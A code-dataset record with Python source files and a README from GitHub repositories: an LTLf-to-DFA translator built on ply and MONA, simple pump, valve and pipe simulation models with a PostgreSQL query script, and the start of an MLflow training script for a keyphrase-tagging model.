'+new_var+' <= max($) & '+ b +' & all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' <= '+new_var+' => '+a+' ) |'\\\n '(all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' <= max($) => '+a+' )'\n\n elif formula_tree[0] == 'Y':\n # print('computed tree: '+ str(self.parsed_formula))\n new_var = _next(var)\n a = translate_bis(formula_tree[1], _type,new_var)\n if var == 'v_0':\n return '('+ 'ex1 '+new_var+': '+ new_var +' = max($) - 1 '+ '& max($) > 0 & '+ a +')'\n else:\n return '('+ 'ex1 '+new_var+': '+ new_var +' = '+ var + ' - 1 '+ '& '+new_var+' > 0 & '+ a +')'\n elif formula_tree[0] == 'S':\n # print('computed tree: '+ str(self.parsed_formula))\n new_var = _next(var)\n new_new_var = _next(new_var)\n a = translate_bis(formula_tree[2], _type,new_var)\n b = translate_bis(formula_tree[1], _type,new_new_var)\n\n if var == 'v_0':\n if b == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & '+ a +' )'\n elif a == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & all1 '+new_new_var+': '+new_var+' < '+new_new_var+' & '+new_new_var+' <= max($) => '+b+' )'\n elif a == 'false': return 'false'\n else: return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & '+ a +' & all1 '+new_new_var+': '+new_var+' < '+new_new_var+' & '+new_new_var+' <= max($) => '+b+' )'\n else:\n if b == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & '+ a +' )'\n elif a == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= '+var+' & all1 '+new_new_var+': '+new_var+' < '+new_new_var+' & '+new_new_var+' <= '+var+' => '+b+' )'\n elif a == 'false': return 'false'\n else: return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= '+var+' & '+ a +' & all1 '+new_new_var+': '+new_var+' < '+new_new_var+' & '+new_new_var+' <= '+var+' => '+b+' )'\n else:\n # handling non-tuple cases\n if formula_tree == 'true': return 'true'\n elif formula_tree == 'false': return 'false'\n\n # enable if you want to see recursion\n # print('computed tree: '+ str(self.parsed_formula))\n\n # BASE CASE OF RECURSION\n else:\n if var == 'v_0':\n if _type == 2:\n return 'max($) in '+ formula_tree.upper()\n else:\n return '0 in '+ formula_tree.upper()\n else:\n return var + ' in ' + formula_tree.upper()\n # if formula_tree.isalpha():\n # if var == 'v_0':\n # return '0 in '+ formula_tree.upper()\n # else:\n # return var + ' in ' + formula_tree.upper()\n # else:\n # return var + ' in ' + formula_tree.upper()\n\ndef _next(var):\n if var == '0' or var == 'max($)': return 'v_1'\n else:\n s = var.split('_')\n s[1] = str(int(s[1])+1)\n return '_'.join(s)\n"
},
{
"alpha_fraction": 0.5003232359886169,
"alphanum_fraction": 0.5048481225967407,
"avg_line_length": 31.93617057800293,
"blob_id": "1bd260e9fc9ca0019e86908b09a011aa288efe61",
"content_id": "d1cdcb4b41bcfb096643b2e65c09868c959595da",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1547,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 47,
"path": "/ltlf2dfa/DotHandler.py",
"repo_name": "francescofuggitti/LTLf2DFA",
"src_encoding": "UTF-8",
"text": "from dotpy.parser.parser import MyParser\nimport os\n\nclass DotHandler:\n\n def __init__(self, path='./inter-automa.dot'):\n self.dot_path = path\n self.new_digraph = None\n\n def modify_dot(self):\n if os.path.isfile(self.dot_path):\n parser = MyParser()\n with open(self.dot_path, 'r') as f:\n dot = f.read()\n f.close()\n\n graph = parser(dot)\n if not graph.is_singleton():\n graph.delete_node('0')\n graph.delete_edge('init', '0')\n graph.delete_edge('0', '1')\n graph.add_edge('init', '1')\n else:\n graph.delete_edge('init', '0')\n graph.add_edge('init', '0')\n self.new_digraph = graph\n else:\n print('[ERROR] - No file DOT exists')\n exit()\n\n def delete_intermediate_automaton(self):\n if os.path.isfile(self.dot_path):\n os.remove(self.dot_path)\n return True\n else:\n return False\n\n def output_dot(self, result_path='./automa.dot'):\n try:\n if self.delete_intermediate_automaton():\n with open(result_path, 'w+') as f:\n f.write(str(self.new_digraph))\n f.close()\n else:\n raise IOError('[ERROR] - Something wrong occurred in the elimination of intermediate automaton.')\n except IOError:\n print('[ERROR] - Problem with the opening of the file %s!' %result_path)"
},
{
"alpha_fraction": 0.6556694507598877,
"alphanum_fraction": 0.6707239151000977,
"avg_line_length": 28.733333587646484,
"blob_id": "7be54af3935a44feb8a633169a16f3f2b59c231b",
"content_id": "d7175a4849abba515dfc5d093287c054ecb68d0e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3122,
"license_type": "permissive",
"max_line_length": 244,
"num_lines": 105,
"path": "/README.md",
"repo_name": "francescofuggitti/LTLf2DFA",
"src_encoding": "UTF-8",
"text": "# LTL<sub>f</sub>2DFA\n[]()\n\nLTL<sub>f</sub>2DFA is a simple tool that processes an LTL<sub>f</sub> formula (with all past or all future operators) and generates the corresponding minimized DFA (Deterministic Finite state Automaton) using [MONA](http://www.brics.dk/mona/).\nThis tool is written in Python 3.6.\n\nIt is tested on Linux Ubuntu 16.04 and on macOS 10.13.6.\n\nNow it is also available online at [ltlf2dfa.diag.uniroma1.it](http://ltlf2dfa.diag.uniroma1.it).\n\n## Getting Started\n\n### Requirements\n\nThis tool uses MONA for the generation of the DFA. Hence, you should first install MONA with all its dependencies on your OS following the instructions [here](http://www.brics.dk/mona/download.html).\n\nThis tool is also based on the following libraries:\n\n- [ply 3.11](https://pypi.org/project/ply/)\n- [dotpy 0.0.2](https://pypi.org/project/dotpy/)\n\nThey are automatically added while installing LTL<sub>f</sub>2DFA.\n\n## How To Install It\n\n- From PyPI:\n```\npip install ltlf2dfa\n```\n- From this repository:\n```\npip install git+https://github.com/Francesco17/LTLf2DFA@master#egg=ltlf2dfa\n```\n\n## How To Use It\n\n- Simply parse an LTL<sub>f</sub> formula with past or future operators:\n```python\nfrom ltlf2dfa.Parser import MyParser\n\nformula = \"G(a->Xb)\"\nparser = MyParser()\nparsed_formula = parser(formula)\n\nprint(parsed_formula)\n```\n- Translate an LTL<sub>f</sub> formula to the corresponding DFA automaton:\n```python\nfrom ltlf2dfa.Translator import Translator\nfrom ltlf2dfa.DotHandler import DotHandler\n\nformula = \"G(a->Xb)\"\ndeclare_flag = False #True if you want to compute DECLARE assumption for the formula\n\ntranslator = Translator(formula)\ntranslator.formula_parser()\ntranslator.translate()\ntranslator.createMonafile(declare_flag) #it creates automa.mona file\ntranslator.invoke_mona() #it returns an intermediate automa.dot file\n\ndotHandler = DotHandler()\ndotHandler.modify_dot()\ndotHandler.output_dot() #it returns the final automa.dot file\n```\n## Syntax\n\nThe syntax accepted by LTL<sub>f</sub>2DFA is the following:\n\n| OPERATOR | SYMBOL |\n|:-------------:|:------:|\n| TRUE | true |\n| FALSE | false |\n| AND | & |\n| OR | \\| |\n| NOT | ~ |\n| IMPLICATION | -> |\n| D-IMPLICATION | <-> |\n| NEXT | X |\n| UNTIL | U |\n| EVENTUALLY | F |\n| GLOBALLY | G |\n| WEAK NEXT | W |\n| RELEASE | R |\n| YESTERDAY (*) | Y |\n| SINCE (*) | S |\n| ONCE (*) | O |\n| GLOBALLY (*) | H |\n\n(*) are PAST operators.\n\nAlso parentheses `(` and `)` can be used.\n\n**NOTE**: LTL<sub>f</sub>2DFA accepts ONLY separated formulas, i.e. formulas that have only past, only future or none operators.\n\n## Author\n\n[Francesco Fuggitti](https://www.linkedin.com/in/francesco-fuggitti-b78336131/)\n\n## License\n\nThis project is licensed under the MIT License - see the [LICENSE](https://github.com/Francesco17/LTLf2FOL/blob/master/LICENSE) file for details\n\n## Contacts\n\nIf, for any reason, you are interested in feel free to contact me by email.\n"
},
{
"alpha_fraction": 0.6161417365074158,
"alphanum_fraction": 0.6318897604942322,
"avg_line_length": 30.78125,
"blob_id": "e76e4cf19b96b97a736162fc10e6040d68a29b1c",
"content_id": "4ffcec557a2b6276583da4915ee2487c79531e82",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1016,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 32,
"path": "/setup.py",
"repo_name": "francescofuggitti/LTLf2DFA",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\nwith open('README.md') as readme_file:\n readme = readme_file.read()\n\nrequirements = ['ply', 'dotpy']\n\nsetup(\n author=\"Francesco Fuggitti\",\n author_email='[email protected]',\n classifiers=[\n 'Development Status :: 1 - Planning',\n 'Intended Audience :: Education',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: POSIX :: Linux',\n ],\n description=\"A tool for generating a DFA from an LTLf formula\",\n install_requires=requirements,\n license=\"MIT license\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n include_package_data=True,\n keywords='ltlf2dfa',\n name='ltlf2dfa',\n packages=find_packages(include=['ltlf2dfa*']),\n url='https://github.com/Francesco17/LTLf2DFA',\n version='0.2.2.post0',\n)"
},
{
"alpha_fraction": 0.45499080419540405,
"alphanum_fraction": 0.4574402868747711,
"avg_line_length": 23.388059616088867,
"blob_id": "c8ddbd527839707608bfb485b499c8573eecff42",
"content_id": "d823746911c7cd4865d3f577e727f0d13ea281c7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1633,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 67,
"path": "/ltlf2dfa/Lexer.py",
"repo_name": "francescofuggitti/LTLf2DFA",
"src_encoding": "UTF-8",
"text": "import ply.lex as lex\n\nclass MyLexer(object):\n\n reserved = {\n 'true': 'TRUE',\n 'false': 'FALSE',\n 'X': 'NEXT',\n 'W': 'WEAKNEXT',\n 'R': 'RELEASE',\n 'U': 'UNTIL',\n 'F': 'EVENTUALLY',\n 'G': 'GLOBALLY',\n 'Y': 'PASTNEXT', #PREVIOUS\n 'S': 'PASTUNTIL', #SINCE\n 'O': 'PASTEVENTUALLY', #ONCE\n 'H': 'PASTGLOBALLY'\n }\n # List of token names. This is always required\n tokens = (\n 'TERM',\n 'NOT',\n 'AND',\n 'OR',\n 'IMPLIES',\n 'DIMPLIES',\n 'LPAR',\n 'RPAR'\n ) + tuple(reserved.values())\n\n # Regular expression rules for simple tokens\n t_TRUE = r'true'\n t_FALSE = r'false'\n t_AND = r'\\&'\n t_OR = r'\\|'\n t_IMPLIES = r'\\->'\n t_DIMPLIES = r'\\<->'\n t_NOT = r'\\~'\n t_LPAR = r'\\('\n t_RPAR = r'\\)'\n # FUTURE OPERATORS\n t_NEXT = r'X'\n t_WEAKNEXT = r'W'\n t_RELEASE = r'R'\n t_UNTIL = r'U'\n t_EVENTUALLY = r'F'\n t_GLOBALLY = r'G'\n # PAST OPERATOR\n t_PASTNEXT = r'Y'\n t_PASTUNTIL = r'S'\n t_PASTEVENTUALLY = r'O'\n t_PASTGLOBALLY = r'H'\n\n t_ignore = r' '+'\\n'\n\n def t_TERM(self, t):\n r'(?<![a-z])(?!true|false)[_a-z0-9]+'\n t.type = MyLexer.reserved.get(t.value, 'TERM')\n return t # Check for reserved words\n\n def t_error(self, t):\n print(\"Illegal character '%s' in the input formula\" % t.value[0])\n t.lexer.skip(1)\n\n # Build the lexer\n def build(self,**kwargs):\n self.lexer = lex.lex(module=self, **kwargs)"
},
{
"alpha_fraction": 0.4057142734527588,
"alphanum_fraction": 0.4208163321018219,
"avg_line_length": 32.57534408569336,
"blob_id": "e606a2901527a4b698917659a90b368ed9201c0c",
"content_id": "53295913dc9a489ba8af467439e7f1d8a504b6fc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2450,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 73,
"path": "/ltlf2dfa/Parser.py",
"repo_name": "francescofuggitti/LTLf2DFA",
"src_encoding": "UTF-8",
"text": "import ply.yacc as yacc\nfrom ltlf2dfa.Lexer import MyLexer\n\nclass MyParser(object):\n\n def __init__(self):\n self.lexer = MyLexer()\n self.lexer.build()\n self.tokens = self.lexer.tokens\n self.parser = yacc.yacc(module=self)\n self.precedence = (\n\n ('nonassoc', 'LPAR', 'RPAR'),\n ('left', 'AND', 'OR', 'IMPLIES', 'DIMPLIES', 'UNTIL', 'RELEASE', 'PASTUNTIL'),\n ('right', 'NEXT', 'WEAKNEXT', 'EVENTUALLY', 'GLOBALLY', 'PASTNEXT', 'PASTEVENTUALLY', 'PASTGLOBALLY'),\n ('right', 'NOT')\n )\n\n def __call__(self, s, **kwargs):\n return self.parser.parse(s, lexer=self.lexer.lexer)\n\n def p_formula(self, p):\n '''\n formula : formula AND formula\n | formula OR formula\n | formula IMPLIES formula\n | formula DIMPLIES formula\n | formula UNTIL formula\n | formula RELEASE formula\n | formula PASTUNTIL formula\n | NEXT formula\n | WEAKNEXT formula\n | EVENTUALLY formula\n | GLOBALLY formula\n | PASTNEXT formula\n | PASTEVENTUALLY formula\n | PASTGLOBALLY formula\n | NOT formula\n | TRUE\n | FALSE\n | TERM\n '''\n\n if len(p) == 2: p[0] = p[1]\n elif len(p) == 3:\n if p[1] == 'F': # eventually A == true UNITL A\n p[0] = ('U','true', p[2])\n elif p[1] == 'G': # globally A == not( eventually (not A) )\n p[0] = ('~',('U', 'true', ('~',p[2])))\n elif p[1] == 'O': # pasteventually A = true SINCE A\n p[0] = ('S','true', p[2])\n elif p[1] == 'H': # pastglobally A == not( pasteventually (not A) )\n p[0] = ('~',('S', 'true', ('~',p[2])))\n else:\n p[0] = (p[1], p[2])\n elif len(p) == 4:\n if p[2] == '->':\n p[0] = ('|', ('~', p[1]), p[3])\n elif p[2] == '<->':\n p[0] = ('&', ('|', ('~', p[1]), p[3]), ('|', ('~', p[3]), p[1]))\n else:\n p[0] = (p[2],p[1],p[3])\n else: raise ValueError\n\n\n def p_expr_group(self, p):\n '''\n formula : LPAR formula RPAR\n '''\n p[0] = p[2]\n\n def p_error(self, p):\n raise ValueError(\"Syntax error in input! %s\" %str(p))"
}
] | 6 |
skoricky/partner
|
https://github.com/skoricky/partner
|
10ea7746f1c4b7583f94d68ca9ff51e490275e01
|
43f50d9eeff1d44886a2c2e962fd0ee9c181aef6
|
42aba7c4b791d029ef607dae3d4c7e44ed25af57
|
refs/heads/master
| 2021-04-03T06:13:49.954326 | 2018-03-27T19:28:12 | 2018-03-27T19:28:12 | 124,451,355 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5442177057266235,
"alphanum_fraction": 0.5732426047325134,
"avg_line_length": 34.532257080078125,
"blob_id": "3164f7f573efbe267b481112c56243cd6ba06e88",
"content_id": "153189c48dee3bc2d70a82c79e7317433e86e013",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2520,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 62,
"path": "/model_common_pipe.py",
"repo_name": "skoricky/partner",
"src_encoding": "UTF-8",
"text": "#!bin/python\n# -*- coding: utf-8 -*-\n\nfrom model_density import *\n\nclass model_common_pipe: # pipe model\n\n def __init__(self, pipe_vol=150.0, completed_vol=140.0, out_p=7.0):\n self.pipe_vol = pipe_vol # Общий объем коллектора/трубы, м3\n self.completed_vol = completed_vol # Заполненный объем, м3\n self.density = 1000.0 # Текущая плотность перекачиваемой среды, кг/м3\n self.d_vol = 0.0 # Мгновенный объем, м3\n self.in_vol = [0.0]\n self.out_vol = [0.0]\n\n # Долевые коэффициенты исходящих расходов по характеристике клапанов/арматуры\n # на выходе из коллектора/трубы\n self.__out_vol_k = [0.0]\n\n # Текущее давление в коллекторе/трубе\n self.current_out_p = self.__get_out_p(out_p)\n\n @staticmethod\n def get_current_dencity(t=20):\n _density = density()\n return _density.get_density(t) # Плотность воды от текущей температуры, кг/м3\n\n @staticmethod\n def get_sum_vol(vol):\n return sum((float(vol[i]) for i in range(0, int(len(vol)))))\n\n def get_single_flow(self, vol):\n sum_vol = self.get_sum_vol(vol)\n single_vol = []\n for i in range(0, int(len(vol))):\n if vol[i] < sum_vol / (len(vol) - 1):\n single_vol.append(vol[i])\n else:\n single_vol.append(sum_vol / (len(vol) - 1))\n return single_vol\n\n def __get_out_p(self, out_p):\n if self.get_sum_vol(self.out_vol) > 0.0:\n return out_p\n else:\n return 0.0\n\n def set_out_p(self, out_p):\n self.current_out_p = self.__get_out_p(out_p)\n return self.current_out_p # давление в коллекторе/трубе, МПа\n\n def get_common_vol(self, in_vol, out_vol, dt, t=20): # t = 20 градусов по умолчанию, плотность 1000 кг/м3\n self.density = self.get_current_dencity(t)\n k = 3600.0 / self.density\n d_vol = (self.get_sum_vol(in_vol) - self.get_sum_vol(out_vol))\n vol = self.completed_vol + (self.d_vol + d_vol) / 2 * (dt / 1000) * k\n self.d_vol = d_vol\n\n if vol < self.pipe_vol * 1.01:\n self.completed_vol = vol\n else:\n self.completed_vol = self.pipe_vol * 1.01\n\n\n"
},
{
"alpha_fraction": 0.446835994720459,
"alphanum_fraction": 0.5484287738800049,
"avg_line_length": 38.37288284301758,
"blob_id": "e23e3ed96540e78e3bb00058bc52a53a369ad946",
"content_id": "b95017b88288a3f111b2d3d75b3ce74b46240087",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2634,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 59,
"path": "/model_pump.py",
"repo_name": "skoricky/partner",
"src_encoding": "UTF-8",
"text": "#!bin/python\n# -*- coding: utf-8 -*-\n\nfrom fun_piecewise import *\nimport math\n\n\nclass model_pump: # pump model\n\n def __init__(self, string_open_es_m, string_current_p): # рассмотреть возможность подключения к базе по KKS\n\n self.string_open_es_m = string_open_es_m\n self.string_current_p = string_current_p\n\n self.open_es_m = 0 # Обратная связь ИМ, \"включено\" двигателя насоса (0-1)\n\n self.nominal_f = 444.0 # Номинальный расход, кг/с\n self.nominal_p = 10.53 # Номинальный перепад давления на напорной арматуре, МПа\n self.current_f = 0.0 # Расход текущий, кг/с\n self.current_p = 0.0 # Давление текущее, МПа\n self.density = 914.0 # Текущая плотность перекачиваемой среды, кг/м3\n self.dp = []\n self.df = []\n\n # Характеристика насоса\n self.dh = [1074.05, 1036.77, 1035.04, 1028.10, 1020.65, 1001.99, 983.24, 965.84, 958.74, 928.47, 896.76, 890.31,\n 861.98, 825.49, 749.41] # Напор, м\n self.dg = [0.0, 403.38, 575.36, 694.64, 820.54, 1010.52, 1158.00, 1308.16, 1518.56, 1691.59, 1825.59, 1840.90,\n 1940.31, 2069.06, 2294.10] # Подача, м3/ч\n\n self.maximum_f = self.__get_dp_df()\n self.line_p = fun_piecewise(self.df, self.dp)\n\n def __get_dp_df(self):\n i = 0\n while i <= len(self.dh) - 1:\n self.dp.append(float(self.density * 9.80665 * self.dh[i] * 0.000001)) # Давление на напоре с учетом плотности, МПа\n i += 1\n\n i = 0\n while i <= len(self.dg) - 1:\n self.df.append(float((self.density * self.dg[i]) / 3600)) # Расход с учетом плотности, кг/с\n i += 1\n\n return self.df[len(self.df) - 1]\n\n def get_current_f(self, eas_p1, eas_p2, eas_rk, dt, k=1):\n if eas_p1 - eas_p2 >= 0.0:\n f = math.sqrt(eas_p1 - eas_p2) * (eas_rk / 100) * k\n if f >= self.df[len(self.df) - 1]:\n self.current_f = self.df[len(self.df) - 1]\n else:\n self.current_f = f\n # self.current_f = (math.sqrt(eas_p1 - eas_p2) * (eas_rk / 100)) * k # k=1250\n self.current_p = self.line_p.get_point(self.current_f)\n return self.current_f\n else:\n self.current_p = self.line_p.get_point(0.0)\n return 0.0\n"
},
{
"alpha_fraction": 0.4716981053352356,
"alphanum_fraction": 0.5133647918701172,
"avg_line_length": 29.285715103149414,
"blob_id": "2513e7f760d63ca32235f77ac91651d3d778f0c7",
"content_id": "08df9a27eccf3db1f6e0a1a9f4d561fc9367f6c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1330,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 42,
"path": "/model_valve.py",
"repo_name": "skoricky/partner",
"src_encoding": "UTF-8",
"text": "#!bin/python\n# -*- coding: utf-8 -*-\n\nimport math\nfrom model_flow import *\n\n\nclass model_valve: # valve model\n\n def __init__(self, string_close_es_sk):\n\n self.string_close_es_sk = string_close_es_sk\n self.string_open_es_sk = string_close_es_sk[:-3] + string_close_es_sk[-3] + '32'\n self.string_aloe_sk = string_close_es_sk[:-3] + string_close_es_sk[-3] + '42'\n self.string_als_sk = string_close_es_sk[:-3] + string_close_es_sk[-3] + '43'\n\n self.pos_sk = 0.0 # Расчетная позиция арматуры на напоре (0.0-100.0), %\n self.travel_time_sk = 52.0 # Время хода напорной арматуры, с\n\n def get_pos_sk(self, pos_sk, aloe, als, weaf, wezu, dt, per=99.45, k=0.6981):\n trv_t = self.travel_time_sk * k\n d_pos = float(per / trv_t) * dt\n\n if weaf == 1:\n return 99.45\n\n if wezu == 1:\n return 0.0\n\n if aloe == 0 and als == 0:\n return pos_sk\n\n if aloe == 1:\n if float(pos_sk + d_pos) < 99.0 and weaf < 1:\n return float(pos_sk + d_pos)\n else:\n return per\n else:\n if float(pos_sk - d_pos) > 0.9 and wezu < 1:\n return float(pos_sk - d_pos)\n else:\n return 0.0\n"
},
{
"alpha_fraction": 0.3981233239173889,
"alphanum_fraction": 0.4262734651565552,
"avg_line_length": 28.84000015258789,
"blob_id": "a84e555896101c23c0a0c54515b6692e0dd713ae",
"content_id": "c31e0060741bce318a7ba91ccfd3c1972d237d07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 25,
"path": "/fun_piecewise.py",
"repo_name": "skoricky/partner",
"src_encoding": "UTF-8",
"text": "#!bin/python\n# -*- coding: utf-8 -*-\n\nclass fun_piecewise: # piecewise function\n\n def __init__(self, in_x, in_y):\n\n self._in_x = in_x\n self._in_y = in_y\n\n def output_y(self, x1, x2, y1, y2, x):\n return (((x - x1) * (y2 - y1)) / (x2 - x1)) + y1\n\n def get_point(self, x):\n if x < self._in_x[0]:\n return self._in_y[0]\n if x > self._in_x[len(self._in_x) - 1]:\n return self._in_y[len(self._in_x) - 1]\n i = 0\n while i < len(self._in_x) - 1:\n if x <= self._in_x[i + 1]:\n if x >= self._in_x[i]:\n return self.output_y(self._in_x[i], self._in_x[i + 1], self._in_y[i], self._in_y[i + 1], x)\n else:\n i += 1\n"
},
{
"alpha_fraction": 0.5610510110855103,
"alphanum_fraction": 0.6244204044342041,
"avg_line_length": 27.130434036254883,
"blob_id": "be42882a1cfe650242878c9a8c371acff851daae",
"content_id": "ce64b5c5d54316c151e2f0d77d1e9aa0f3f94f40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 647,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 23,
"path": "/module_psql_conn.py",
"repo_name": "skoricky/partner",
"src_encoding": "UTF-8",
"text": "#!bin/python\n# -*- coding: utf-8 -*-\n\nimport psycopg2\n\nconn = psycopg2.connect(host='localhost', port='5439', user='postgres', password='postgres', dbname='getdb')\n\ntry:\n cursor = conn.cursor()\n cursor.execute(\"SELECT abonent_id, page_kks, page_no FROM f7952415767822940get.pages WHERE abonent_id = 633 AND page_id::VARCHAR LIKE '199%'\")\n f = cursor.fetchall()\n for n in range(0, len(f)):\n for i in range(0, len(f[n])):\n print(f[n][i])\n\nexcept psycopg2.DatabaseError as Error_test:\n print(\"no good\")\n\nconn.close()\n\n# arr = [1, 2, 3, 4, 5, 1, 1.1]\n#\n# print(sum((float(arr[i]) for i in range(0, int(len(arr))))))\n"
},
{
"alpha_fraction": 0.4679849445819855,
"alphanum_fraction": 0.5160075426101685,
"avg_line_length": 27.675676345825195,
"blob_id": "7618ddd032d23a5a27a6487e82610519eb52a76e",
"content_id": "ef731a1aa90bc551f359eb5bf3209693f1cd15d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1116,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 37,
"path": "/model_flow.py",
"repo_name": "skoricky/partner",
"src_encoding": "UTF-8",
"text": "#!bin/python\n# -*- coding: utf-8 -*-\n\nimport math\n\n\nclass model_flow: # flow model\n\n def __init__(self, string_eas_p1='', string_eas_p2='', string_eas_rk=''):\n self.string_eas_rk = string_eas_rk\n self.string_eas_p1 = string_eas_p1\n self.string_eas_p2 = string_eas_p2\n self.eas_rk = 0.0\n self.eas_p1 = 0.0\n self.eas_p2 = 0.0\n self.density = 1000.0\n\n self.current_f = 0.0\n self.kv = 130.0 # максимальная пропускная способность запорного устройства, м3/ч\n\n def get_current_f(self, k=1):\n eas_rk = self.eas_rk\n eas_p1 = self.eas_p1\n eas_p2 = self.eas_p2\n kv = self.kv\n density = self.density / 1000\n maximum_f = kv * self.density / 3600\n\n if eas_p1 - eas_p2 >= 0.0:\n f = k * (eas_rk * kv / 100) * math.sqrt(density * (eas_p1 - eas_p2))\n if f >= maximum_f:\n self.current_f = maximum_f\n else:\n self.current_f = f\n return self.current_f\n else:\n return 0.0\n\n"
}
] | 6 |
pchding/kph
|
https://github.com/pchding/kph
|
08af9aea70c3e4f4bcea194a3f67dfbbf8b740b5
|
5dc04c92e778669d46109398fc27bec94002c2ec
|
ec7bb93f4f27ef780b6dc492a62a762b24036ca4
|
refs/heads/master
| 2022-11-24T04:58:36.325821 | 2020-07-21T20:10:36 | 2020-07-21T20:10:36 | 268,815,328 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5762049555778503,
"alphanum_fraction": 0.5865537524223328,
"avg_line_length": 35.75,
"blob_id": "110ab69a1613099a9f6ecf349ac51ad1d93fca43",
"content_id": "aa9f497b53b2c4ea48f803a580504858901672fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13818,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 376,
"path": "/mlflow/kemodel.py",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
"text": "import mlflow\nimport torch\nfrom torch import nn\nimport time\nimport torchtext\nimport click\nimport numpy as np\nimport pandas as pd\nimport spacy\nfrom torchcrf import CRF\nimport ast\nimport subprocess\nimport mlflow.pytorch\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch import helpers\n\n\[email protected](help=\"Convert JSON to PD. Tag key phrases\")\[email protected](\"--df_in\", default='dfprocessed.p')\[email protected](\"--embvec\", default=1)\[email protected](\"--embvecache\", default='/home/pding/Documents/glove/')\[email protected](\"--val_ratio\", default=0.2)\[email protected](\"--rnnsize\", default=128)\[email protected](\"--batchsize\", default=310)\[email protected](\"--lr\", default=0.01)\[email protected](\"--weight_decay\", default=1e-5)\[email protected](\"--n_epochs\", default=15)\[email protected](\"--model_save\", default='model0.pt')\[email protected](\"--json_in\", default='pmed.json')\[email protected](\"--json_out\", default='pmedaug.json')\[email protected](\"--es\", default=1)\[email protected](\"--inputfile\", default=1,\n help=\"Whether to use the input.txt\")\ndef ketraintest(inputfile, df_in, embvec, embvecache, val_ratio, rnnsize, batchsize,lr, weight_decay, n_epochs, model_save\n json_in, json_out, es):\n if inputfile == 1:\n with open(\"input.txt\", \"r\") as f:\n para = ast.literal_eval(f.read())\n df_in = para['df_in']\n embvec = para['embvec']\n embvecache = para['embvecache']\n val_ratio = para['val_ratio']\n rnnsize = para['rnnsize']\n batchsize = para['batchsize']\n lr = para['lr']\n weight_decay = para['weight_decay']\n n_epochs = para['n_epochs']\n model_save = para['model_save']\n if embvec == 1:\n embvec = torchtext.vocab.GloVe(name='840B', dim=300, cache=embvecache)\n use_pretrained = True\n subprocess.getoutput(\"python -m spacy download en_core_web_sm\")\n svoc = spacy.load(\"en_core_web_sm\")\n datao = pd.read_pickle(df_in)\n datatrain = datao[datao['Extracted']>=3]\n datatest = datao[datao['Extracted']<3]\n # separate train and validate\n dtrain = datatrain.loc[:,['SRC','TRG']]\n dtraink = datatrain.loc[:,['SRC','TRG','keywords']]\n seed = 250\n idx = np.arange(datatrain.shape[0])\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n np.random.shuffle(idx)\n val_size = int(len(idx) * val_ratio)\n df_train = dtrain.iloc[idx[val_size:], :]\n df_val = dtrain.iloc[idx[:val_size], :]\n df_val_k = dtraink.iloc[idx[:val_size], :]\n df_test = datatest.loc[:,['SRC','TRG']]\n dtraink = datatrain.loc[:,['SRC','TRG','keywords']]\n df_val_k = dtraink.iloc[idx[:val_size], :]\n # Load original dataset\n datai = pd.read_json(json_in, orient='index', convert_dates=False, convert_axes=False)\n datai = datai[datai.abstract.notnull()]\n datai = datai[datai.title.notnull()]\n datai = datai.replace('\\n',' ', regex=True)\n datai = datai.replace('\\t',' ', regex=True)\n dataiu = datai.loc[datai.keywords.str.len() ==0]\n dataik = datai.loc[datai.keywords.str.len() >0]\n dataiu['SRC'] = dataiu.title + ' '+ dataiu.abstract\n tokenizertrg = lambda x: x.split()\n\n def tokenizersrc(text): # create a tokenizer function\n return [tok.text for tok in svoc.tokenizer(text)]\n def safe_value(field_val):\n return field_val if not pd.isna(field_val) else \"Other\"\n def safe_year(field_val):\n 